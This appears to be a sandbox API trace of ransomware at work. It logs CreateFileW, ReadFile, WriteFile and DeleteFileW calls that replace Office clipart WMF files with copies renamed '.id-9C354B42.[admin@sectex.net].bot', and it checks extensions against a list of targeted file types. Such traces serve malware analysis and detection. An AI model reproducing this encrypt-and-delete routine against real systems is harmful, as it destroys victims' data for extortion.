	[0150.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.333] GetLastError () returned 0x0
	[0150.333] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xb758, lpOverlapped=0x0) returned 1
	[0150.341] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xb760, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xb760, lpOverlapped=0x0) returned 1
	[0150.343] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.343] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.343] SetEndOfFile (hFile=0x38c) returned 1
	[0150.343] CloseHandle (hObject=0x38c) returned 1
	[0150.343] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.343] SetEndOfFile (hFile=0x25c) returned 1
	[0150.346] CloseHandle (hObject=0x25c) returned 1
	[0150.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf")) returned 1
	[0150.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.347] lstrlenW (lpString=".doc") returned 4
	[0150.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.347] lstrlenW (lpString=".docx") returned 5
	[0150.347] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.347] lstrlenW (lpString=".pdf") returned 4
	[0150.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.347] lstrlenW (lpString=".xls") returned 4
	[0150.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.347] lstrlenW (lpString=".xlsx") returned 5
	[0150.347] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.347] lstrlenW (lpString=".ppt") returned 4
	[0150.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString=".zip") returned 4
	[0150.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.348] lstrlenW (lpString=".rar") returned 4
	[0150.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString=".bz2") returned 4
	[0150.348] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString=".7z") returned 3
	[0150.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString=".dbf") returned 4
	[0150.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString=".1cd") returned 4
	[0150.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString=".jpg") returned 4
	[0150.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.348] lstrlenW (lpString=".doc") returned 4
	[0150.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString=".docx") returned 5
	[0150.348] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.348] lstrlenW (lpString=".pdf") returned 4
	[0150.348] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.348] lstrlenW (lpString=".xls") returned 4
	[0150.348] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.348] lstrlenW (lpString=".xlsx") returned 5
	[0150.348] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.348] lstrlenW (lpString=".ppt") returned 4
	[0150.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.349] lstrlenW (lpString=".zip") returned 4
	[0150.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.349] lstrlenW (lpString=".rar") returned 4
	[0150.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.349] lstrlenW (lpString=".bz2") returned 4
	[0150.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.349] lstrlenW (lpString=".7z") returned 3
	[0150.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.349] lstrlenW (lpString=".dbf") returned 4
	[0150.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.349] lstrlenW (lpString=".1cd") returned 4
	[0150.349] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63
	[0150.349] lstrlenW (lpString=".jpg") returned 4
	[0150.349] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.349] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.349] lstrlenW (lpString="J0090149.WMF") returned 12
	[0150.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.392] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=28212) returned 1
	[0150.392] CloseHandle (hObject=0x3e0) returned 1
	[0150.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf")) returned 0x20
	[0150.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.392] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.392] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.395] GetLastError () returned 0x0
	[0150.395] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x6e34, lpOverlapped=0x0) returned 1
	[0150.397] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6e40, lpOverlapped=0x0) returned 1
	[0150.399] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.399] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.399] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.399] CloseHandle (hObject=0x3d4) returned 1
	[0150.399] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.399] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.401] CloseHandle (hObject=0x3e0) returned 1
	[0150.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.402] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf")) returned 1
	[0150.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.402] lstrlenW (lpString=".doc") returned 4
	[0150.402] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.402] lstrlenW (lpString=".docx") returned 5
	[0150.402] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.402] lstrlenW (lpString=".pdf") returned 4
	[0150.402] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.402] lstrlenW (lpString=".xls") returned 4
	[0150.402] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.402] lstrlenW (lpString=".xlsx") returned 5
	[0150.403] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.403] lstrlenW (lpString=".ppt") returned 4
	[0150.403] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString=".zip") returned 4
	[0150.403] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.403] lstrlenW (lpString=".rar") returned 4
	[0150.403] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString=".bz2") returned 4
	[0150.403] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString=".7z") returned 3
	[0150.403] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString=".dbf") returned 4
	[0150.403] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString=".1cd") returned 4
	[0150.403] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString=".jpg") returned 4
	[0150.403] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.403] lstrlenW (lpString=".doc") returned 4
	[0150.403] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString=".docx") returned 5
	[0150.403] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.403] lstrlenW (lpString=".pdf") returned 4
	[0150.403] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.403] lstrlenW (lpString=".xls") returned 4
	[0150.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.404] lstrlenW (lpString=".xlsx") returned 5
	[0150.404] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.404] lstrlenW (lpString=".ppt") returned 4
	[0150.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.404] lstrlenW (lpString=".zip") returned 4
	[0150.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.404] lstrlenW (lpString=".rar") returned 4
	[0150.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.404] lstrlenW (lpString=".bz2") returned 4
	[0150.404] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.404] lstrlenW (lpString=".7z") returned 3
	[0150.404] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.404] lstrlenW (lpString=".dbf") returned 4
	[0150.404] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.404] lstrlenW (lpString=".1cd") returned 4
	[0150.404] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63
	[0150.404] lstrlenW (lpString=".jpg") returned 4
	[0150.404] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.404] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.404] lstrlenW (lpString="J0090390.WMF") returned 12
	[0150.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.405] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17638) returned 1
	[0150.405] CloseHandle (hObject=0x3e0) returned 1
	[0150.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf")) returned 0x20
	[0150.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.406] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.406] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.407] GetLastError () returned 0x0
	[0150.407] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x44e6, lpOverlapped=0x0) returned 1
	[0150.409] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x44f0, lpOverlapped=0x0) returned 1
	[0150.410] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.410] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.410] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.410] CloseHandle (hObject=0x3d4) returned 1
	[0150.410] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.410] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.412] CloseHandle (hObject=0x3e0) returned 1
	[0150.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf")) returned 1
	[0150.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.413] lstrlenW (lpString=".doc") returned 4
	[0150.413] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.413] lstrlenW (lpString=".docx") returned 5
	[0150.413] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0150.413] lstrlenW (lpString=".pdf") returned 4
	[0150.414] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString=".xls") returned 4
	[0150.414] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.414] lstrlenW (lpString=".xlsx") returned 5
	[0150.414] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0150.414] lstrlenW (lpString=".ppt") returned 4
	[0150.414] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString=".zip") returned 4
	[0150.414] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.414] lstrlenW (lpString=".rar") returned 4
	[0150.414] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString=".bz2") returned 4
	[0150.414] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString=".7z") returned 3
	[0150.414] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString=".dbf") returned 4
	[0150.414] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString=".1cd") returned 4
	[0150.414] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString=".jpg") returned 4
	[0150.414] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.414] lstrlenW (lpString=".doc") returned 4
	[0150.414] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.414] lstrlenW (lpString=".docx") returned 5
	[0150.414] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0150.415] lstrlenW (lpString=".pdf") returned 4
	[0150.415] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString=".xls") returned 4
	[0150.415] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.415] lstrlenW (lpString=".xlsx") returned 5
	[0150.415] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0150.415] lstrlenW (lpString=".ppt") returned 4
	[0150.415] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.415] lstrlenW (lpString=".zip") returned 4
	[0150.415] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.415] lstrlenW (lpString=".rar") returned 4
	[0150.415] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString=".bz2") returned 4
	[0150.415] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString=".7z") returned 3
	[0150.415] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.415] lstrlenW (lpString=".dbf") returned 4
	[0150.415] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.415] lstrlenW (lpString=".1cd") returned 4
	[0150.415] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63
	[0150.415] lstrlenW (lpString=".jpg") returned 4
	[0150.415] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.415] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.415] lstrlenW (lpString="J0090777.WMF") returned 12
	[0150.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.416] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3332) returned 1
	[0150.416] CloseHandle (hObject=0x3e0) returned 1
	[0150.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf")) returned 0x20
	[0150.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.417] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.417] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
